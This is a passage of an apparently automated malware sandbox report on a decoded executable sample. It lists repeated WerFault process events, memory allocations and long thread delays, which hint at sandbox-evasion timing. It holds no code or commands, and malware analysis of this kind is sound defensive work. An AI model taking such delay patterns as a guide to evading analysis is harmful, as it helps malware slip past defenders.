                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeMemory allocated: 4A80000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599438Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599323Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599109Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599000Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598891Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598781Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598671Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598563Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598438Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598313Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598188Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598078Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597964Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597859Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597750Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597641Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597502Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597369Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597250Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597123Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597016Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596891Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596768Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596641Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596531Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596422Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596313Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596203Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 596094Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595969Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeWindow / User API: threadDelayed 7879Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeWindow / User API: threadDelayed 1956Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 5944Thread sleep count: 7879 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 5944Thread sleep count: 1956 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599438s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599323s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -599000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598891s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598671s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598563s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598438s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598313s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598188s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -598078s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597964s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597859s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597750s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597641s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597502s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597369s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597250s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597123s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -597016s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596891s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596768s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596641s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596422s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596313s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596203s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -596094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595969s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -595110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -594985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -594860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -594735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -594610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -594485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -594360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe TID: 4236Thread sleep time: -594235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599438Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599323Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599109Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 599000Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598891Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598781Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598671Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598563Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598438Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598313Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598188Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 598078Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597964Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 597859Jump to behavior
